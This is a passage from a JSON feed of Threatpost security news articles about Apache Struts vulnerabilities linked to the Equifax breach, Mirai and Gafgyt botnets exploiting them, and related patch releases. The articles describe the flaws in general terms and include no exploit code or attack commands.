$290.5 million to state and federal regulatory agencies to pay attorneys\u2019 fees and costs in the multi-district litigation.\n\nIn the past month, a slew of fines and penalties have been imposed that were tied privacy and data breach incidents. Earlier in July, the [FTC slapped](<https://threatpost.com/privacy-experts-facebooks-5b-fine/146478/>) a $5 billion fine on Facebook for privacy violations following its Cambridge Analytica incident. Also hit with security-related fines in July were [Marriott](<https://threatpost.com/marriott-123m-fine-data-breach/146320/>) ($123 million) and [British Airways](<https://threatpost.com/post-data-breach-british-airways-slapped-with-record-230m-fine/146272/>) ($230 million).\n\nWhile opinions are mixed about the appropriate penalty for these companies and Equifax, security experts for their part hope that other companies will take note of the fines when it comes to data security and privacy.\n\n\u201cI\u2019m far from an Equifax apologist, but the truth is it could have been anyone,\u201d Adam Laub, chief marketing officer at STEALTHbits Technologies said in an email. \u201cIt\u2019s not an excuse, but rather the reality we live in. The best outcome isn\u2019t Equifax making the situation right \u2013 although that is important for all of those affected \u2013 it\u2019s everyone else learning that the price to be paid outweighs the inconvenience of ensuring proper measures are taken to secure the data that puts them at risk in the first place. And it\u2019s got to be from the ground up too. There\u2019s no silver bullet.\u201d\n\n**_Interested in more on patch management? Don\u2019t miss our free live _**[**_Threatpost webinar_**](<https://attendee.gotowebinar.com/register/1579496132196807171?source=ART>)**_, \u201c_****_Streamlining Patch Management,\u201d on Wed., July 24, at 2:00 p.m. EDT. Please join Threatpost editor Tom Spring and a panel of patch experts as they discuss the latest trends in Patch Management, how to find the right solution for your business and what the biggest challenges are when it comes to deploying a program. _****_[Register and Learn More](<https://attendee.gotowebinar.com/register/1579496132196807171?source=ART>)_**\n", "cvss3": {}, "published": "2019-07-22T14:31:39", "type": "threatpost", "title": "Equifax to Pay $700 Million in 2017 Data Breach Settlement", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2019-07-22T14:31:39", "id": "THREATPOST:5ADABEB29891532ECFF2D6ABD99CAED4", "href": "https://threatpost.com/equifax-to-pay-700-million-in-2017-data-breach-settlement/146579/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:53:59", "description": "Public attacks and scans looking for exposed Apache webservers have ramped up dramatically since Monday when a vulnerability in the Struts 2 web application framework was [patched](<https://cwiki.apache.org/confluence/display/WW/S2-045>) and proof-of-concept exploit code was introduced into Metasploit.\n\nThe vulnerability, [CVE-2017-5638](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638>), was already under attack in the wild prior to Monday\u2019s disclosure, but since then, the situation has worsened and experts fear it\u2019s going to linger for a while.\n\n\u201cThe second someone starts working on a [Metasploit module](<https://github.com/rapid7/metasploit-framework/issues/8064>), it\u2019s a ramp-up for rapid exploitation by a large number of people,\u201d said Craig Williams, senior technical leader for Cisco\u2019s Talos research outfit. \u201cWe\u2019re basically seeing a huge number of people continue to exploit the vulnerability. That\u2019s likely going to continue to increase. I think what we\u2019re also going to see is people going to try to scan for the vulnerability.\u201d\n\nThe flaw lives in the Jakarta Multipart parser upload function in Apache. It allows an attacker to easily make a maliciously crafted request (a malicious Content-Type value) to an Apache webserver and have it execute. Struts 2.3.5 to Struts 2.3.31 are affected as are Struts 2.5 to 2.5.10; admins are urged to upgrade immediately to [Struts 2.3.32](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.32>) or [2.5.10.1](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1>).\n\nTalk of the vulnerability surfaced on Chinese forums, according to Vincente Motos, who posted an advisory on the [HackPlayers](<http://www.hackplayers.com/2017/03/exploit-rce-para-apache-struts-cve-2017-5638.html>) website. Motos said a notorious Apache Struts hacker known as Nike Zheng posted a public proof-of-concept exploit demonstrating the simplicity in which an attacker could inject operating system commands.\n\nThe attacks are particularly risky to anyone running their Apache webservers as root, which is not a suggested practice. Williams said it\u2019s unclear whether an attacker can benignly scan for vulnerable servers in order to determine the version and context under which Struts is running, whether as Apache or root, for example. But as with some older internet-wide bugs, there are a large number of scans happening.\n\n\u201c[Attacks] look like requests to a webserver with a malformed piece,\u201d Williams said. \u201cUnless you\u2019re looking for it, it\u2019s easy not to see the malformed content type.\u201d\n\nAn attacker, he said, would need to just modify one line depending on the operating system the target is running, Windows or Linux, and have it download a malicious binary from the web.\n\n\u201cUnfortunately, due to the nature of command-line injections like this, it\u2019s very easy to modify,\u201d Williams said. \u201cAnd that\u2019s why I think we\u2019re going to continue to see exploitation rise for the foreseeable future.\u201d\n\nThe risks are severe for an organization running an exposed Apache server if it\u2019s compromised.\n\n\u201cThe sky\u2019s the limit,\u201d Williams said. \u201cIf I\u2019m a bad guy, depending on what my game is, I can take over your webserver and use that to move laterally through your network. If I\u2019m super insidious, I can use that to look for your domain controller and if I can find a way to compromise your password hashes, say from the Linux server I compromised, I can possibly log in to your domain controller and use that to push malware to all your machines. I could ransom off your webserver, all kinds of terrible things.\u201d\n\nWilliams said [Cisco has observed](<http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>) that the majority of public attacks feature a number of Linux bots used for DDoS attacks taking advantage of this vulnerability, along with an IRC bouncer, and a malware sample related to the bill gates botnet.\n\nWilliams cautioned as well that connected devices in the IoT space could also be a major concern, since Struts 2 likely runs there.\n\n\u201cI\u2019m going to guess there\u2019s a reasonable number of devices running it, and due to the nature of IoT, those aren\u2019t going to be patched any time soon. So this is going to be an issue for the foreseeable future.\u201d\n\nGiven the availability of patches and detection rules, it\u2019s likely that public attacks are going to be largely mitigated and as more detection rules surface, public exploits should be less useful to attackers.\n\n\u201cDue to the fact that it\u2019s relatively easy to go inside and modify an attack, it\u2019s going to be bad and it\u2019s going to plague us for some time,\u201d Williams said. \u201cGood news is that detecting it is not that difficult.\u201d\n", "cvss3": {}, "published": "2017-03-09T12:25:46", "type": "threatpost", "title": "Attacks Heating Up Against Apache Struts 2 Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-09T19:50:52", "id": "THREATPOST:1C2F8B65F8584E9BF67617A331A7B993", "href": "https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-30T05:51:10", "description": "Researchers have discovered new variants for the infamous Mirai and Gafgyt IoT botnets \u2013 now targeting well-known vulnerabilities in Apache Struts and SonicWall.\n\nThe new Mirai strain targets the Apache Struts flaw associated with the 2017 Equifax breach, while the Gafgyt variant uses a newly-disclosed glitch impacting older, unsupported versions of SonicWall\u2019s Global Management System, according to researchers with Palo Alto Networks in a [Sunday ](<https://researchcenter.paloaltonetworks.com/2018/09/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/>)post.\n\n\u201cHere we\u2019re seeing Mirai and Gafgyt variants targeting systems mostly seen in enterprises,\u201d Ruchna Nigam, researcher with Palo Alto Networks, told Threatpost. \u201cUltimately, future trends are open to speculation, but we know that targeting enterprise links offers bigger bandwidth from a DDoS perspective. For now, it looks that the attackers may be doing a test run on the efficacy of using different vulnerabilities, with the intention of spotting ones that herd the maximum number of bots, affording them greater firepower for a DDoS.\u201d\n\n**Mirai Evolves**\n\nResearchers said that they discovered samples of a Mirai variant on Sept. 7 incorporating exploits that targeted 16 separate vulnerabilities.\n\nThe variant notably exploits the critical arbitrary command-execution flaw in Apache Struts ([CVE-2017-5638](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>)) that was patched in March 2017. This marks the first known instance of Mirai targeting a vulnerability in Apache Struts, researchers said. Attackers could use specially crafted content-type, content-disposition or content-length HTTP headers to launch an arbitrary command-execution attack.\n\nThough a patch has been available for over a year now, many consumers may not have updated their systems \u2013 an issue that led to the already-patched [vulnerability](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>) being responsible for the Equifax breach last summer that impacted 147 million consumers.\n\nFlaws in Apache Struts have been actively exploited in the wild in other recent campaigns; these include a large cryptomining campaign using the recently disclosed Apache Struts 2 critical remote code-execution (CVE-2018-11776) [vulnerability](<https://threatpost.com/active-campaign-exploits-critical-apache-struts-2-flaw-in-the-wild/137207/>), which was patched in August.\n\nThe other 15 vulnerabilities targeted by the newest Mirai strain have been incorporated into the botnet in the past, including a Linksys remote code-execution flaw in Linksys E-Series devices, a Vacron NVR remote code-execution glitch, a remote code-execution issue in D-Link devices, remote code-execution vulnerabilities in CCTVs and DVRs from up to 70 vendors, and a flaw (CVE-2017-6884) in Zyxel routers.\n\nUnit 42 also found that the domain currently hosting these Mirai samples previously resolved to a different IP address during the month of August \u2014 an IP address hosting a new version of Gafgyt as well.\n\n**Gafgyt Adds to Bag of Tricks**\n\nIn August, the observed IP was \u201cintermittently hosting samples of Gafgyt that incorporated an exploit against CVE-2018-9866, a SonicWall vulnerability affecting older versions of SonicWall Global Management System (GMS),\u201d according to Nigam.\n\nThe targeted vulnerability ([CVE-2018-9866](<https://nvd.nist.gov/vuln/detail/CVE-2018-9866>)) exists in the lack of validation of user-supplied parameters pass to XML-RPC calls on SonicWall Global Management System (GMS) virtual appliances, allowing remote users to execute arbitrary code.\n\nThis vulnerability affects older, unsupported GMS versions, including 8.1 and earlier (the flaw is not present in supported versions). A Metasploit module was first [published](<https://www.exploit-db.com/exploits/45124/>) earlier this summer for the flaw; SonicWall then published a [public advisory](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2018-0007>) about the critical issue July 17.\n\nSonicWall has been notified of this latest development with Gafgyt, researchers said.\n\n\u201cThe vulnerability disclosed in this post is not an announcement of a new vulnerability in SonicWall GMS,\u201d a SonicWall spokesperson told Threatpost. \u201cThe issue referenced only affects an older version of the GMS software (version 8.1) which was replaced by version 8.2 in December 2016. Customers and partners running GMS version 8.2 and above are protected against this vulnerability. Customers still using GMS version 8.1 should apply a hotfix supplied by SonicWall in August 2018 and plan for an immediate upgrade, as GMS 8.1 went out of support in February 2018.\u201d\n\nThe Gafgyt botnet exploits a range of IoT flaws, including other issues in Huawei, GPON and D-Link devices.\n\nOnce in, it then fetches an update from <HTTP_SERVER>, saves it to <FILE_LOCATION>, and installs the update. After that, the botnet launches a Blacknurse DDoS attack, an attack that involves ICMP Type 3 Code 3 packets causing high CPU loads first discovered in November 2016.\n\n\u201cOne thing that stood out was the Gafgyt variant having support for the BlackNurse DDoS attack method,\u201d Ruchna told us. \u201cThe earliest samples I have seen supporting this DDoS method are from September 2017.\u201d\n\n**Continued Development**\n\nThe discovery of new targeted vuln comes after it was revealed in July that Mirai and Gafgyt were actively launching two IoT/Linux botnet [campaigns](<https://threatpost.com/d-link-dasan-routers-under-attack-in-yet-another-assault/134255/>), exploiting the [CVE-2018-10562 and CVE-2018-10561 bugs in Dasan routers](<https://threatpost.com/millions-of-home-fiber-routers-vulnerable-to-complete-takeover/131593/>).\n\nIn October 2016, the world was introduced to Mirai when it [overwhelmed servers](<https://threatpost.com/dyn-ddos-could-have-topped-1-tbps/121609/>) at global domain provider Dynamic Network Services (Dyn); that led to the blockage of more than 1,200 websites, including Netflix and Twitter. The Mirai source code was then released in Oct. 2016, with Mirai variants continuing to pop up left and right since then.\n\nMost recently, in April, a variant of the Mirai [botnet](<https://threatpost.com/mirai-variant-targets-financial-sector-with-iot-ddos-attacks/131056/>) was used to launch a series of DDoS campaigns against financial sector businesses, while in January, researchers identified a variant called [Satori (Mirai Okiru)](<https://threatpost.com/satori-author-linked-to-new-mirai-variant-masuta/129640/>).\n", "cvss3": {}, "published": "2018-09-10T14:23:09", "type": "threatpost", "title": "Mirai, Gafgyt Botnets Return to Target Infamous Apache Struts, SonicWall Flaws", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-6884", "CVE-2018-10561", "CVE-2018-10562", "CVE-2018-11776", "CVE-2018-9866"], "modified": "2018-09-10T14:23:09", "id": "THREATPOST:FC5665486C9D63E5C0C242F47F66ACF1", "href": "https://threatpost.com/mirai-gafgyt-botnets-return-to-target-infamous-apache-struts-sonicwall-flaws/137309/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-06-28T05:48:46", "description": "A critical remote code-execution vulnerability in Apache Struts 2, the popular open-source framework for developing web applications in the Java programming language, is threatening a wide range of applications, even when no additional plugins have been enabled. Successful exploitation could lead to full endpoint and eventually network compromise, according to researchers \u2013 who said that the flaw is more dangerous than the similar vulnerability used to compromise Equifax last year.\n\nA [working exploit](<https://threatpost.com/poc-code-surfaces-to-exploit-apache-struts-2-vulnerability/136921/>) surfaced within a day of its disclosure.\n\nThe vulnerability ([CVE-2018-11776](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11776>)) was [patched](<https://cwiki.apache.org/confluence/display/WW/S2-057>) by the Apache Software Foundation yesterday and affects all supported versions of Struts 2: Users of Struts 2.3 should upgrade to 2.3.35; users of Struts 2.5 need to upgrade to 2.5.17. They should do so as soon as possible, given that bad actors are likely already working on exploits, according to the Semmle research team\u2019s Man Yue Mo, who uncovered the flaw.\n\n\u201cThis vulnerability affects commonly-used endpoints of Struts, which are likely to be exposed, opening up an attack vector to malicious hackers,\u201d he said in a [posting](<https://semmle.com/news/apache-struts-CVE-2018-11776>) on Wednesday. \u201cOn top of that, the weakness is related to the Struts Object-Graph Navigation Language (OGNL) language, which hackers are very familiar with, and are known to have been exploited in the past.\u201d\n\n[OGNL](<https://commons.apache.org/proper/commons-ognl/>) is a powerful, domain-specific language that is used to customize Struts\u2019 behavior.\n\n\u201cOn the whole, this is more critical than the highly critical Struts RCE vulnerability that the Semmle Security Research Team discovered and announced last September,\u201d said Yue Mo, referring to the infamous vulns (CVE-2017-9805) that hackers used to compromise Equifax last year, which led to the lifting of [personal details of 147 million consumers](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>).\n\nTim Mackey, technology evangelist at Synopsys, told Threatpost that this is due to the fact that it affects a wider swath of the Struts architecture.\n\n\u201cIn the case of CVE-2018-11776, the root cause [is] a lack of input validation on the URL passed to the Struts framework,\u201d he explained. \u201cThe prior [Struts] vulnerabilities were all in code within a single functional area of the Struts code. This meant that developers familiar with that functional area could quickly identify and resolve issues without introducing new functional behaviors. CVE-2018-11776 operates at a far deeper level within the code, which in turns requires a deeper understanding of not only the Struts code itself, but the various libraries used by Struts. It is this level of understanding which is of greatest concern \u2013 and this concern relates to any library framework.\u201d\n\n## Anatomy of the Flaw\n\nThe vulnerability is caused by insufficient validation of untrusted user data in the core of the Struts framework, according to the team\u2019s findings.\n\n\u201cAttackers can attack vulnerable applications by injecting their own namespace as a parameter in an HTTP request,\u201d they explained. \u201cThe value of that parameter is insufficiently validated by the Struts framework, and can be any OGNL string.\u201d\n\nBecause the issue affects the core of Struts, there are at least two separate attack vectors \u2013 and potentially many more.\n\nIn the first attack scenario, three Struts result types are unsafe when used without a namespace, as defined in either in the Struts configuration file or in Java code if the Struts Convention plugin is used. These are the redirect action, which redirects the visitor to a different URL; action chaining, which is a method to chain multiple actions into a defined sequence or workflow; and postback result, which renders the current request parameters as a form which immediately submits a postback to the specified destination chain or postback.\n\nThe researchers explained: \u201cAn example of a struts.xml configuration that is potentially vulnerable: the <action \u2026> tag does not have a namespace attribute and contains a result of type redirectAction. If you use the Struts Convention plugin, you will also have to look for actions and results that are configured using Java code.\u201d\n\nThe second attack vector has to do with the fact that Struts supports page templates inside <result> tags in the Struts configuration: \u201cThe use of URL tags in such pages is potentially unsafe if the template is referred to from an <action> tag that does not provide a namespace attribute (or specifies a wildcard namespace),\u201d the researchers said. \u201cYour application is vulnerable if the template contains an <s:url \u2026> tag without an action or value attribute.\u201d\n\nResearchers noted that for an exploit for either of the known vectors to be successful, an application must have the alwaysSelectFullNamespace flag set to \u201ctrue\u201d in the Struts configuration \u2013 a default state if the application uses the popular Struts Convention plugin. Also, the application\u2019s actions must be configured without specifying a namespace, or with a wildcard namespace (e.g. \u201c/*\u201d).\n\n\u201cThis applies to actions and namespaces specified in the Struts configuration file (e.g. <action namespace=\u201dmain\u201d>), but also to actions and namespaces specified in Java code if you are using the Struts Convention plugin,\u201d they explained.\n\nThat said, they also cautioned that other attack vectors may emerge that apply to different configurations.\n\n\u201cWhether or not a Struts application is vulnerable to remote code execution largely depends on the exact configuration and architecture of the application,\u201d the firm said. \u201cNote that even if an application is currently not vulnerable, an inadvertent change to a Struts configuration file may render the application vulnerable in the future. You are therefore strongly advised to upgrade your Struts components, even if you believe your configuration not to be vulnerable right now.\u201d\n\nThis is a critical point, according to Mackey. \u201cValidating the input to a function requires a clear definition of what is acceptable,\u201d he said. \u201cIt equally requires that any functions available for public use document how they use the data passed to them. Absent the contract such definitions and documentation form, it\u2019s difficult to determine if the code is operating correctly or not. This contract becomes critical when patches to libraries are issued as its unrealistic to assume that all patches are free from behavioral changes. Modern software is increasingly complex and identifying how data passes through it should be a priority for all software development teams.\u201d\n\nPavel Avgustinov, vice president of QL Engineering at Semmle, laid out what\u2019s at stake in a media statement: \u201cCritical remote code-execution vulnerabilities like the [one that affected Equifax](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>) and the one we announced [this week] are incredibly dangerous for several reasons: Struts is used for publicly-accessible customer-facing websites, vulnerable systems are easily identified, and the flaw is easy to exploit,\u201d he said. \u201cA hacker can find their way in within minutes, and exfiltrate data or stage further attacks from the compromised system. It\u2019s crucially important to update affected systems immediately; to wait is to take an irresponsible risk.\u201d\n", "cvss3": {}, "published": "2018-08-23T16:46:57", "type": "threatpost", "title": "Apache Struts 2 Flaw Uncovered: \u2018More Critical Than Equifax Bug\u2019", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-9805", "CVE-2018-11776"], "modified": "2018-08-23T16:46:57", "id": "THREATPOST:D5150098043DAE7CDF2E31618C33F5D2", "href": "https://threatpost.com/apache-struts-2-flaw-uncovered-more-critical-than-equifax-bug/136850/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:53:11", "description": "The Apache Software Foundation has patched a critical remote code execution vulnerability affecting all versions of the popular application development framework Struts since 2008.\n\nAll web applications using the framework\u2019s REST plugin are vulnerable. Users are advised to upgrade their Apache Struts components as a matter of urgency, according to Semmle, a software engineering analytics firm that first identified the bug.\n\n\u201cThis particular vulnerability allows a remote attacker to execute arbitrary code on any server running an application built using the Struts framework and the popular REST communication plugin. The weakness is caused by the way Struts deserializes untrusted data,\u201d the company wrote in [a technical write-up](<https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement>) on the vulnerability published on Tuesday in coordination with the release of a patch by Apache Software Foundation (ASF).\n\n\u201cThis is as serious as it gets; if remote attackers are allowed to exploit the newly identified vulnerability it can critically damage thousands of enterprises,\u201d said Oege de Moor, CEO and founder of Semmle.\n\nAffected developers are urged to [upgrade to Apache Struts version 2.5.13](<https://struts.apache.org/announce.html#a20170905>).\n\nThe ASF said there is no workaround available for the vulnerability ([CVE-2017-9805](<https://struts.apache.org/docs/s2-052.html>)) in Struts, an open-source framework for developing web applications in the Java programming language.\n\n\u201cThe best option (sans an upgrade) is to remove the Struts REST plugin when not used or limit it to server normal pages and JSONs only,\u201d the ASF wrote in a [security bulletin issued Tuesday](<https://struts.apache.org/docs/s2-052.html>).\n\nSemmle cites estimates the vulnerability could impact 65 percent of the Fortune 100 companies that use web applications built with the Struts framework.\n\n\u201cOrganizations like Lockheed Martin, the IRS, Citigroup, Vodafone, Virgin Atlantic, Reader\u2019s Digest, Office Depot, and Showtime are known to have developed applications using the framework. This illustrates how widespread the risk is,\u201d Semmle researcher Bas van Schaik wrote Tuesday, citing estimates by analysts at the software developer research firm RedMonk.\n\nMultiple similar vulnerabilities have been reported tied to Struts. Earlier this year, attackers were exploiting a critical Apache Struts vulnerability on Windows servers and dropping Cerber ransomware on the machines.\n\n[In March](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>), public attacks and scans looking for exposed Apache webservers were reportedly on the rise after a vulnerability ([CVE-2017-5638](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638>)) in the Struts 2 web application framework was [patched](<https://cwiki.apache.org/confluence/display/WW/S2-045>) and proof-of-concept exploit code was introduced into Metasploit.\n\nSemmle said this most recent vulnerability is caused by the way Struts deserializes untrusted data. Deserialization is the processes of taking structured data from one format and rebuilding it into an object. The processes can be tweaked for malicious intent and has been used in a host of attack scenarios including denial-of-service, access control and remote code execution attacks.\n\nThe remote code execution attack Semmle identified is possible when using the Struts REST plugin with the XStream handler to facilitate XML payloads. XStream is a Java library used to serialize objects to XML (or JSON) and back again.\n\n\u201cLgtm (Semmle\u2019s open-source [code analysis tool](<https://lgtm.com/>)) identifies alerts in code using queries written in a specially-designed language: QL. One of the many queries for Java detects potentially unsafe deserialization of user-controlled data. The query identifies situations in which unsanitized data is deserialized into a Java object. This includes data that comes from an HTTP request or from any other socket connection,\u201d Semmle said in a [second technical analysis of the vulnerability](<https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement>) posted Tuesday.\n\nData contained in one of the arguments (toObject) should be considered \u201ctainted\u201d and \u201cunder the control of a remote user and should not be trusted.\u201d This query detects common ways through which user-controlled data flows to a deserialization method, researchers said. \u201cHowever, some projects use a slightly different approach to receive remote user input,\u201d they said.\n\nSemmle said it has developed a \u201csimple\u201d working exploit for this vulnerability but currently has no plans to disclose it.\n\n\u201cThere is no suggestion that an exploit is publicly available, but it is likely that one will soon be,\u201d van Schaik wrote in a blog post.\n", "cvss3": {}, "published": "2017-09-05T14:10:54", "type": "threatpost", "title": "Patch Released for Critical Apache Struts Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-05T18:44:40", "id": "THREATPOST:7DFB677F72D6258B3CDEE746C764E29E", "href": "https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T05:28:22", "description": "Oracle patched 250 vulnerabilities across hundreds of different products as part of its [quarterly Critical Patch Update](<http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html>) released today.\n\nRounding out the list of products with the most patches is Oracle Fusion Middleware with 38, Oracle Hospitality Applications with 37 and Oracle MySQL with 25.\n\nOf the critical patches, security researchers at Onapsis said that they identified three high-risk SQL injections vulnerabilities in Oracle\u2019s popular Oracle E-Business Suite (EBS).\n\n\u201cWhile all three are high-risk vulnerabilities, one (CVE-2017-10332) is very easy to exploit,\u201d said JP Perez-Etchegoyen, CTO of Onapsis.\n\nOnapsis is warning users of Oracle EBS (versions 12.1 and 12.2) that they are exposed to SQL injection vulnerabilities that could allow an attacker, over a network without any username and password credentials, to potentially gain access to and modify critical documents and information such as credit card data, customer information, HR documents or financial records.\n\nPerez-Etchegoyen said each of the SQL injection vulnerabilities can easily be exploited by attackers who can disrupt, exfiltrate or manipulate data that is part of a business\u2019 enterprise resource planning, supply chain management or finance management systems.\n\n\u201cThese vulnerabilities are especially risky as an attacker would only need a web browser and network access to the EBS system HTTP interface to perform it,\u201d Perez-Etchegoyen said.\n\nOnapsis said vulnerabilities found in Oracle\u2019s EBS are on the rise, with a 29 percent increase in 2017 compared to the previous year.\n\nThe[ patches come](<http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html>) just weeks after Oracle OpenWorld where Larry Ellison, co-founder, executive chairman and chief technology officer of Oracle, stressed the importance of security during his keynote. Ellison also used the occasion to stress the importance of software patching in light of the [recent Equifax breach](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>).\n\nLast month, Oracle used an advisory as an opportunity to remind users that [in April it ](<https://threatpost.com/record-oracle-patch-update-addresses-shadowbrokers-struts-2-vulnerabilities/125046/>)fixed the Struts vulnerability (CVE-2017-5638) which was behind [Equifax\u2019s massive breach of 143 million Americans](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>),\n\nOrganizations are falling down when it comes to patching their most important business-critical applications, Perez-Etchegoyen said.\n\nCiting a recent Ponemon Research study, Perez-Etchegoyen said fewer than half of the 600 respondents interviewed said they have a monthly plan to implement security patches for their Oracle EBS applications. Seventy percent believe it is likely their company would have a data breach due to insecure Oracle EBS applications that they have failed to secure or apply patches to.\n\nAlso part of Oracle\u2019s quarterly update are patches for its Java Platform, Standard Edition that received 22 new security fixes. Twenty of these vulnerabilities may be remotely exploitable without authentication, for example, they may be exploited over a network without requiring user credentials, Oracle said. The highest CVSS base score of vulnerabilities affecting Oracle Java SE is 9.6.\n\nImpacted are Java Advanced Management Console, Java SE, Java SE Embedded and JRockit.\n\nOracle Database Server received six security fixes with two of the vulnerabilities remotely exploitable without authentication. Affected Oracle Database Server components include Spatial (Apache Groovy), WLM (Apache Tomcat), Java VM, RDBMS Security, Core RDBMS and XML Database.\n", "cvss3": {}, "published": "2017-10-17T18:13:09", "type": "threatpost", "title": "Oracle Patches 250 Bugs in Quarterly Critical Patch Update", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-10332", "CVE-2017-5638"], "modified": "2017-10-17T18:13:09", "id": "THREATPOST:0308A7143D92E14583CCD684912ABD67", "href": "https://threatpost.com/oracle-patches-250-bugs-in-quarterly-critical-patch-update/128484/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:10", "description": "A group of developers behind Apache Struts, believed by some to be the culprit behind [last week\u2019s Equifax breach](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>), took umbrage with those claims over the weekend.\n\nRen\u00e9 Gielen, vice president of the Apache Struts Project Management Committee (PMC) at the Apache Software Foundation, wrote Saturday that if Struts was targeted, it\u2019s unclear which vulnerability, if any was exploited.\n\n[The letter,](<https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax>) which was written on behalf of the Struts PMC, was spurred by an internal analyst report published last week that suggested data from Equifax\u2019s servers was breached via an unnamed Apache Struts flaw.\n\nThe report penned by Jeffrey Meuler, a senior research analyst with Baird Equity Research, the research arm of the financial services firm Robert W. Baird & Co, did not provide a source for the finding. Meuler did not immediately return a request for further comment when contacted on Monday.\n\nGielen\u2019s letter took particular issue with a Quartz.com article that initially alleged CVE-2017-9805, a critical remote code execution vulnerability that the ASF [patched last Tuesday](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>), was the Struts vulnerability to blame for the breach of 143 million Americans\u2019 records. The [Quartz article](<https://qz.com/1073221/the-hackers-who-broke-into-equifax-exploited-a-nine-year-old-security-flaw/>) \u2013 since edited \u2013 initially claimed that CVE-2017-9805 had existed in the wild for nine years, something Gielen had a hard time buying. Gielen said Saturday that since the breach was detected back in July, it\u2019s likely the Equifax attackers either used an unknown Struts zero day or an earlier announced vulnerability on an unpatched Equifax server.\n\nGielen says the ASF takes \u201cenormous efforts\u201d to secure software it produces, like Struts, and makes a conscious effort to hold back sensitive information around vulnerabilities. There is no silver bullet for preventing exploits from surfacing in the wild however.\n\n\u201cSince vulnerability detection and exploitation has become a professional business, it is and always will be likely that attacks will occur even before we fully disclose the attack vectors, by reverse engineering the code that fixes the vulnerability in question or by scanning for yet unknown vulnerabilities.\u201d\n\nIf the attackers had used CVE-2017-9805, it would have been considered a zero day at the time, but according to Gielen, the Apache PMC was only recently notified of the vulnerability \u2013 something it quickly remedied.\n\n\u201cWe were notified just recently on how a certain piece of code can be misused, and we fixed this ASAP,\u201d Gielen said, \u201cWhat we saw here is common software engineering business \u2014 people write code for achieving a desired function, but may not be aware of undesired side-effects. Once this awareness is reached, we as well as hopefully all other library and framework maintainers put high efforts into removing the side-effects as soon as possible. It\u2019s probably fair to say that we met this goal pretty well in case of CVE-2017-9805.\u201d\n\nGielen concluded his letter with a series of best practices for businesses who use Apache Struts to follow, including being aware which framework/libraries are used in their setup, that processes to roll out security fixes are established, and perhaps most importantly, to understand that complex software can contain flaws.\n\nAn Apache spokeswoman [told Reuters on Friday](<https://www.reuters.com/article/us-equifax-cyber/criticism-of-equifax-data-breach-response-mounts-shares-tumble-idUSKCN1BJ1NF>) that it appeared Equifax had not applied patches for flaws discovered this year.\n\nIt\u2019s unclear exactly which vulnerability the spokeswoman was referring to. The Struts vulnerability fixed last week affected all web apps that used the framework\u2019s REST plugin. Another Struts vulnerability, CVE-2017-5638, was publicized and incorporated into Metasploit [in March](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>). That flaw stemmed from Struts\u2019 Jakarta Multipart parser upload functionality and allowed an attacker to execute requests to an Apache webserver. Researchers with Cisco Talos, [who found the bug](<http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>), said it was being exploited in the wild when it was disclosed.\n\nResearchers with Contrast Security posit it\u2019s more likely the attacker used CVE-2017-5638, an expression language injection vulnerability leveraged via the content-type header, to hit Equifax.\n\n\u201cThe first vulnerability from March seems much more likely because it\u2019s easier to exploit and much better known. It also fits the timeline better, since it was released months before Equifax was attacked in July,\u201d Jeff Williams, Contrast\u2019s co-founder and chief technology officer, [wrote Saturday](<https://www.contrastsecurity.com/security-influencers/a-week-of-web-application-hacks-and-vulnerabilities>).\n\nWilliams echoed a few sentiments made by Gielen, including the fact that maintaining the security of libraries can be tricky but should remain a focus for businesses.\n\n\u201cKeeping libraries up to date isn\u2019t a small amount of work, as these changes come out frequently. Often these changes require rewriting, retesting, and redeploying the application, which can take months. I have recently 